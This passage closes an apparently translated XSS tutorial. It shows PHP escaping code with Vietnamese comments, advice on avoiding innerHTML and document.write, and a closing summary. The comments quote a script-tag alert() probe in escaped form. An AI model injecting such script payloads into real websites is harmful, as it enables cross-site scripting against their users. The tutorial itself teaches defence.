class="token punctuation">;</span> <span class="token comment">// Sẽ chuyển thành: &lt;script&gt;alert('Hello World!')&lt;/script&gt;gt;</span> <span class="token variable">$noidung</span> <span class="token operator">=</span> <span class="token function">mysqli_real_escape_string</span> <span class="token punctuation">(</span> <span class="token variable">$db</span> <span class="token punctuation">,</span> <span class="token variable">$noidung</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token comment">// Chuyển thành: &lt;script&gt;alert('Hello World!')&lt;/script&gt;gt;</span> <span class="token delimiter important">?></span></span> |
As for DOM-based XSS, you should refer to the documents of the Javascript Framework you are currently using or restrict the use of methods or functions: innerHTML, outerHTML, document.write, but use textContent instead.
Summary
Through this article, I have introduced to you what XSS is, how dangerous is it, as well as classifying and example each individual XSS vulnerability. If you have any questions, please do not hesitate to comment below so I can know.
And don’t forget the unwritten rule: “Never trust user input”